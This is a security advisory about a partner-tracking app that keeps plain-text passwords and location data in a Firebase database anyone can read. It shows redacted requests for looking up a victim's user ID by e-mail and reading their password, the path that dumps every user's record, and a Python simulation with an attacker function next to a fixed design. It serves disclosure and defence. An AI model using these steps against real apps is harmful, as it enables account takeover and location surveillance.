SIK-2017-025


Title:

Passwords Freely Available in GirlFriend Cell Tracker App

Report ID

SIK-2017-025

Summary:

The GirlFriend Cell Tracker app stores user passwords in plain text in a Firebase database that can be read without any authentication. Knowing only a victim's e-mail address, an attacker can obtain the numeric user ID from the app's own API, read the password and location data from Firebase, and log into the app as the victim. Requesting the parent path returns the records of all users at once.
Details:

The GirlFriend Cell Tracker app uses Google Firebase in combination with a private API hosted on the vendor's own server. The login sequence works as follows: the user enters their e-mail address (which serves as the user name) into the app. The app then requests the numeric user ID for this account from the custom web server:

Request:

POST /****/***/login HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Host: *****
Connection: close
User-Agent: okhttp/2.4.0

{"user_email":"foo@bar.com"}

Response:

HTTP/1.1 200 OK
Date: Tue, 13 Jun 2017 17:45:36 GMT
Server: Apache Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 142

{"login_data":[{"user_id":"149737514214639","user_type":"1"}],"ResponseCode":"1","ResponseMsg":"log in data","Result":"True","TimeZone":"GMT"}

With this numeric user ID, the app queries the Firebase database:

https://*****.firebaseio.com/****/******

The Firebase record contains the password in plain text, along with the last location and the display name the user entered:

{
  last_location={
    address= Rheinstraße 75 64295 Darmstadt Germany
    date=13/06/2017
    lat=49.8717048
    long=8.6387116
    time=07:37:22 PM
  }
  user_buy=false
  user_email=foo@bar.com
  user_name=Sepp
  user_password=123456
  user_speed=0
  user_token=cQfgiDRWx9o:APA91bGTkU1N9FZo3c9ZIwReYR6nzNiFaJaRgBq_1pi07SVcLvXvPeRiqMFcXD3bzFZVwrKW3H6F84xrolHX9OaB...
  user_type=1
}

An attacker can therefore simply ask the custom server for the user ID belonging to an arbitrary e-mail address, query the Firebase database for that user's password, and log into the app as that user. Neither request requires any authentication.

In fact, the app verifies the user's password on the client side: it fetches the stored password from Firebase and compares it with the value the user typed in. Firebase request for the password:

https://******.firebaseio.com/****/*******/user_password

Record retrieved from the server:

DataSnapshot { key = user_password, value = 123456 }

If the parent path is requested without a concrete user ID, Firebase returns the records of all users. Request:

https://*****.firebaseio.com/****

The response is left out for privacy reasons. It contains passwords, location data, URLs of freely accessible profile pictures, the names of the Wi-Fi networks users are connected to, whether they are on Wi-Fi or GSM, their signal strengths, the timestamp of the last location update, and the battery status of the device. Since the passwords are included, every one of these users can be impersonated: an attacker can simply log into the app as them to obtain even more data than the dump already contains (for example, the full location history).
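The two-request login flow described above, and the client-side password check that follows it, as an added example that is not the app's or the vendor's code. It uses a constructed in-memory stand-in for the custom API and for the Firebase tree (the hostnames and paths are redacted on this page and are not reproduced; the record contents mirror the redacted example above), reproduces the app's flow as shipped, the attacker's shortcut, and the unrestricted root read, and then shows a server-side variant of the check along the lines of the Suggested Mitigation below. The function names and the hashing parameters are assumptions made for this example.

```python
"""Added example, not the app's or vendor's code: the advisory's login flow
against a constructed in-memory backend, next to a server-side variant."""
import hashlib
import hmac
import json
import os
import secrets

# Constructed stand-ins for the two backends the advisory describes: the custom
# API that maps e-mail -> user_id, and the Firebase tree keyed by user_id.
CUSTOM_API_USERS = {"foo@bar.com": {"user_id": "149737514214639", "user_type": "1"}}
FIREBASE_TREE = {
    "149737514214639": {
        "user_email": "foo@bar.com",
        "user_name": "Sepp",
        "user_password": "123456",  # stored in plain text, readable by anyone
        "last_location": {"lat": 49.8717048, "long": 8.6387116},
    }
}


def custom_api_login(body: str) -> str:
    """Stand-in for the POST .../login request: maps user_email to user_id.
    Returns JSON shaped like the response shown in the advisory."""
    email = json.loads(body)["user_email"]
    rec = CUSTOM_API_USERS.get(email)
    if rec is None:
        return json.dumps({"login_data": [], "ResponseCode": "0", "Result": "False"})
    return json.dumps({"login_data": [rec], "ResponseCode": "1",
                       "ResponseMsg": "log in data", "Result": "True",
                       "TimeZone": "GMT"})


def firebase_get(path: str):
    """Stand-in for an unauthenticated read of a Firebase path. No security
    rules: every path under the root, including the root itself, is readable."""
    node = FIREBASE_TREE
    for part in [p for p in path.split("/") if p]:
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


# --- Flow as shipped: the comparison happens on the client ------------------
def app_login_as_shipped(email: str, entered_password: str) -> bool:
    """Step 1: ask the custom API for the numeric user_id.
    Step 2: read user_password from Firebase. Step 3: compare on the client."""
    resp = json.loads(custom_api_login(json.dumps({"user_email": email})))
    if resp["Result"] != "True":
        return False
    user_id = resp["login_data"][0]["user_id"]
    return firebase_get(f"{user_id}/user_password") == entered_password


def harvest_password(email: str):
    """The attacker's version: the same two requests, minus the comparison."""
    resp = json.loads(custom_api_login(json.dumps({"user_email": email})))
    if resp["Result"] != "True":
        return None
    return firebase_get(f"{resp['login_data'][0]['user_id']}/user_password")


# --- Hardened flow: verify on the server, store only a salted hash ----------
SERVER_CREDENTIALS = {}  # email -> (salt, hash); reachable through no read path


def _hash(password: str, salt: bytes) -> bytes:
    # PBKDF2 parameters are an assumption for this example.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def server_register(email: str, password: str) -> None:
    salt = os.urandom(16)
    SERVER_CREDENTIALS[email] = (salt, _hash(password, salt))


def server_login(email: str, password: str):
    """Returns an opaque session token on success, None otherwise. The client
    never sees the stored credential, and no database path contains it."""
    cred = SERVER_CREDENTIALS.get(email)
    if cred is None:
        return None
    salt, expected = cred
    if not hmac.compare_digest(_hash(password, salt), expected):
        return None
    return secrets.token_urlsafe(32)
```

The hardened variant changes two things the shipped design lacks: the comparison runs where the client cannot observe the stored credential, and the credential store is not reachable through any read path, so the user-enumeration step no longer yields anything that can be replayed as a login.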

Workaround

None.

Suggested Mitigation

Use a proper authentication method: verify credentials on the server side (for example with Firebase Authentication or inside the custom API) and store only salted password hashes, never plain-text passwords. Restrict the Firebase database with security rules so that a client can read only its own record, and never the password field. Never give out data to unauthenticated users.

Timeline

  • 2017-08-09: Vulnerability Discovered
  • 2017-08-09: Developer contacted
  • 2018-08-11: Published